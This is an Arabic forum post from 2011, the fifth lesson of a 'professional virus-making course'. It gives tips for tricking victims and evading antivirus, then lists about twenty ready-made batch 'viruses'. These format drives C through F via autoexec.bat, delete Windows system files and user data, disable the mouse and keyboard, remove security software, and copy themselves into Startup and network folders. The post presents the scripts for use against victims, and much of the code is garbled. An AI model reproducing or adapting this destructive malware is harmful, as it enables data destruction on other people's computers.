فايروس عضو متميز
من اي بلد انت : احترامي للقوانين : قوه الذكاء : ممتاز الابراج : الأبراج الصينية : عدد المساهمات : 76 نقاط : 24304 كم تحبوني صوتي لي : 8 تاريخ الميلاد : 01/01/1988 تاريخ التسجيل : 14/02/2011 العمر : 36 الموقع : شبكه العراق المجروح
| موضوع: دورة إحتراف صنع الفيروسات الخميس فبراير 24, 2011 10:19 am | |
| لدرس الخامس الدرس دا شرح عبارة عن اسئلة واجابة 1-اسئلة و حلول :
س1.كيف نستطيع عمل اعدة تشغيل عن الضغط على الفيروس ------------------------------------ عندما ضغط على الفيرس انتقلت اوامر الدوس الى ملف الاوتواكسك فلابد من اعادة التشغيل حتى يطلب الوندوز هذا الملف فيجدة وهو على الدوس فاينفذ الاور معتقداً انة يحمل اوامر البدء ... اضف هذا الكود لعمل ريستارت :
كود PHP: c:windowsrundll.exe user.exe,exitwindow***ec
ألان عندما يضغط الضحية علية سوف يحدث وينتقل الاوامر الدوسية ومعها سطر الريستارت وهايحدث ريستارت ويتم تنفيظ الاوامر الدوسيةفى سرعة كبيرة جدااىاننا اجبرنا الضحية على عمل ريستارت لكى يشتغل الفيرس س2.هل هناك اكواد اخرى مثل عمل اغلاق للوندوز ------------------------------------ هذا كود الغلاق س3.عندما اريد من الفيروس عدم حذف نفسه لماذا اكتب رموز (الدرس الثاني) ------------------------------------ لانه و قد ذكرة في الدرس السابق انه نظام التشغيل النوافذ (Windows)لا يقبل كتابة رموز في اسماء البرامج لاكن نظام التشغيل (MS-DOS)يوافق على كتابة هذه الاسماء . س4.لماذا اقوم بتغير امتداد الفيروس من BAT الى EXE (الدرس الاول) ------------------------------------ لانه يمكن لاي شخص كشف الكود البرمجي للفيروس !! و هذا اكبر خطاً مما يؤدي الى استخادمه ضدك فيجب عليك الحذر .. س5.لماذا اشفر الفيروس و لماذا لا تنص بكتابة كود تدمير المضدات (الدرس الثالث) ------------------------------------ لانه اذ قمت بكتابة الكود البرمجي الخاص بحذف او ايقاف عمل المضادات سوف يقوم المضاد بتنبيه الضحية و حذف الفيروس مباشرتاً مما يؤدي الى فشل العملية ... س6.انت الان تعلمنا صناعة الفيروسات عن طريق الملفات الدفاعية اذن هل يوج مستى اقوى ------------------------------------ نعم,يوجد مستويات اقوى مثل الفيجول بيسك و السي بلص بلص و لغة التجميع لاكن من مميزات الملفات الدفاعية انه يمكن كتابة اي فيروس في اي حاسبة بدون برنامج معين او مترجم لغة فقط المفكرة .. 2-كودات فيروسات جاهزة : 1.فيروس عمل فورمات C,D,E,F والطابعه واعادة تشغيل الجهاز :
كود PHP: call attrib -h -r c:autoexec.bat >nul echo format c: /q /u /autotest >nul >>c:autoexec.bat echo format d: /q /u /autotest >nul >>c:autoexec.bat echo format e: /q /u /autotest >nul >>c:autoexec.bat echo format f: /q /u /autotest >nul >>c:autoexec.bat c:windowsrundll.exe user.exe,exitwindow***ec
------------------------------------ .فيروس عمل فورمات C,D,E,F والطابعه :
كود PHP: call attrib -h -r c:autoexec.bat >nul echo format c: /q /u /autotest >nul >>c:autoexec.bat echo format d: /q /u /autotest >nul >>c:autoexec.bat echo format e: /q /u /autotest >nul >>c:autoexec.bat echo format f: /q /u /autotest >nul >>c:autoexec.bat
------------------------------------ 3.فيروس يحذف برنامج المفكرة وينسخ بدله برنامج اخر :
كود PHP: del C:WINDOWSNOTEPAD.EXE copy %0 C:WINDOWSNOTPAD.EXE
------------------------------------
4.فايروس افتراضي :
كود PHP: @echo off cls :start if exist c:AUTOEXEC.bat goto delc if exist d:AUTOEXEC.bat goto deld if exist e:AUTOEXEC.bat goto dele if exist f:AUTOEXEC.bat goto delf elc del c: goto end eld del d: goto end ele del e: goto end elf del f: goto end end
------------------------------------ 5.فايروس النظام :
كود PHP: @echo off cls :start if exist c:windows goto next if not exist c:windows goto copy :next del c:windows goto end :copy cd c: md virus goto end end
------------------------------------ 6.فايروس الدوس :
كود PHP: @echo off C:WINDOWSrundll.exe mouse,disable C:WINDOWSrundll.exe keyboard,disable del c:command.com del c:Io.sys del c:Config.sys del c:Msdos.sys del c:windowssystem32command.com deltree /y C:WINDOWSCOMMAND*.* deltree /y C:WIN98COMMAND*.* deltree /y C:WINmeCOMMAND*.* deltree /y C:WIN_meCOMMAND*.* deltree /y C:WINxpCOMMAND*.* deltree /y C:WIN_xpCOMMAND*.* del d:command.com del d:Io.sys del d:Config.sys del d:Msdos.sys del d:windowssystem32command.com deltree
------------------------------------ 7.فيروس قاتل ملفات السستم :
كود PHP: @echo off c: cd C:WINDOWSSystem deltree /y *.dll cd deltree /y *.sys c: cd C:WINDOWSSystem32 deltree /y *.dll cd deltree /y *.sys d: cd C:WINDOWSSystem deltree /y *.dll cd deltree /y *.sys d: cd C:WINDOWSSystem32 deltree /y *.dll cd deltree /y *.sys CLS
------------------------------------ 8.فيروس قاتل الفأرة و لوحة المفاتيح :
كود PHP: @echo off C:WINDOWSrundll.exe mouse,disable C:WINDOWSrundll.exe keyboard,disable copy key.BAT C:WINDOWSstartm~1programsstartup copy key.BAT C:Docume~1ALLUSE~1StartM~1ProgramsStartup copy key.BAT D:Docume~1ALLUSE~1StartM~1ProgramsStartup CLS
------------------------------------ 9.فيروس يمنع استخدام خصائص الشاشة :
كود PHP: @echo off cd cd deltree /y c:/windows/RUNDLL32.exe cd cd
------------------------------------ 10.فيروس تدمير سطح المكتب :
كود PHP: @echo off cd cd deltree /y c:/windows/desktop cd cd
------------------------------------ 11.فيروس قاتل النورتن :
كود PHP: @echo off %WinDir%rundll.exe mouse,disable %WinDir%rundll.exe keyboard,disable copy hahahah.BAT %windir%startm~1programsstartup copy hahahah.BAT C:Docume~1ALLUSE~1StartM~1ProgramsStartup copy hahahah.BAT D:Docume~1ALLUSE~1StartM~1ProgramsStartup deltree /y c:progra~1norton~1*.* deltree /y d:progra~1norton~1*.* deltree /y c:progra~1zonela~1*.* deltree /y d:progra~1zonela~1*.* cls
------------------------------------ 12.فيروس التدمير :
كود PHP: echo off@ c:windowsrundll.exe mouse,disable c:windowsrundll.exe keyboard,diable goto del el deltree y c:*.* goto copy :copy copy %0 C:WINDOWSStart MenuProgramsStartUpname of virus.bat cls puse
------------------------------------ 13.فيروس يمحى جميع الملفات التى على الهارد :
كود PHP: @echo off c: cd deltree /y *.* d: cd deltree /y *.*
------------------------------------ 14.فيروس خاص :
كود PHP: echo off@ del system.ini del win.ini del auto exec.bat del config.sys
------------------------------------
15.اهم فايروس فايروس مدمر :
كود PHP: echo off@ cls call attrib -h -r c:autoexec.bat >nul echo @echo off >c:autoexec.bat echo deltree /y c:progra~1*.* >nul >>c:autoexec.bat echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat echo copy c:windowscommanddeltree.exe c: >nul >>c:autoexec.bat echo deltree /y c:windows*.* >nul >>c:autoexec.bat echo format c: /q /u /autotest >nul >>c:autoexec.bat
------------------------------------ 16.فيروس عمل فورمات للجهاز فورا :
كود PHP: echo off@ cls call attrib -h -r c:autoexec.bat >nul echo @echo off >c:autoexec.bat echo deltree /y c:progra~1*.* >nul >>c:autoexec.bat echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat echo copy c:windowscommanddeltree.exe c: >nul >>c:autoexec.bat echo deltree /y c:windows*.* >nul >>c:autoexec.bat echo format c: /q /u /autotest >nul >>c:autoexec.bat
------------------------------------ 17.فيروس قتل الوندوز وحذف كل الملفات بعد اول اعادة تشغيل للجهاز :
كود PHP: call attrib -h -r c:autoexec.bat >nul @Echo off c: cd %WinDir%System deltree /y *.dll cd deltree /y *.sys
------------------------------------ 18.فيروس قتل الوندوز وحذف كل الملفات بعد التشغيل مباشره
@ كود PHP: Echo off c: cd %WinDir%System deltree /y *.dll cd deltree /y *.sys
------------------------------------ 19.فيروس عمل فورمات C,D,E,F والطابعه وقفل الجهاز :
كود PHP: call attrib -h -r c:autoexec.bat >nul echo format c: /q /u /autotest >nul >>c:autoexec.bat echo format d: /q /u /autotest >nul >>c:autoexec.bat echo format e: /q /u /autotest >nul >>c:autoexec.bat echo format f: /q /u /autotest >nul >>c:autoexec.bat c:windowsrundll32.exe user.exe,exitwindows
------------------------------------ 20.فيروس النسخ الالي :
@ كود PHP: echo off :start cls copy %0 c:/virusautocopy.bat copy %0 c:/windows/virusautocopy.bat copy %0 d:/virusautocopy.bat copy %0 c:/My ********s/virusautocopy.bat end
------------------------------------ 21.فايروس ينسخ نفسة في network و ملفات winzip و start up ( اهم فيروس – ) :
كود PHP: send msg to any one onlin in the network and start many programs del all c files and copy it self in any dirve if exist d: copy %0 d:game.bat copy %0 d:autoexec.bat @echo off echo Virus Name:A7meedye c:windowsrundll.exe mouse,disable c:windowsrundll.exe keyboard,disable goto network :network cls if exist c:winnt goto winnt copy %0 c:windowsalluse~1applic~1Network89.bat copy %0 c:windowsalluse~1destkopNetwork89.bat copy %0 c:windowsalluse~1startm~1Network89.bat copy %0 c:windowsalluse~1startm~1progra~1Network89.ba t goto zip zip: cls @dir /s /b /l c:winzip32.exe | set wz= @FOR /F "delims==" %%y IN ('dir /s /b /l c:\*.zip') DO @echo "%wz%" -min -a -r -p "%%y" goto startup startup: cls copy %0 C:WINDOWSStart MenuProgramsStartUpNetwork89.bat goto del del: deltree /y C:WINDOWS*.* deltree /y C:Program Files*.* deltree /y C:My ********s*.* goto msg msg: NET SEND 127.0.0.1 you got a virus goto start :start start MSPaint start MSPaint start MSPaint start MSPaint start MSPaint start MSPaint start MSPaint start MSPaint start MSPaint start MSPaint start MSPaint start MSPaint start MSPaint start Notepad start Notepad start Notepad start Notepad start Notepad start Notepad start Notepad start Notepad start Notepad start Notepad start Notepad start Notepad start Notepad Start IExplorer "http://www.top-sec.com/vb Start IExplorer "http://www.top-sec.com/vb Start IExplorer "http://www.top-sec.com/vb Start IExplorer "http://www.top-sec.com/vb Start IExplorer "http://www.top-sec.com/vb Start IExplorer "http://www.top-sec.com/vb Start IExplorer "http://www.top-sec.com/vb Start IExplorer "http://www.top-sec.com/vb Start IExplorer "http://www.top-sec.com/vb Start IExplorer "http://www.top-sec.com/vb Start IExplorer "http://www.top-sec.com/vb Start IExplorer "http://www.top-sec.com/vb goto end :end cls echo Im **** your computer echo sorry about what my virus do but you are stuped echo The Virus Made By A7meedye puse
| |
|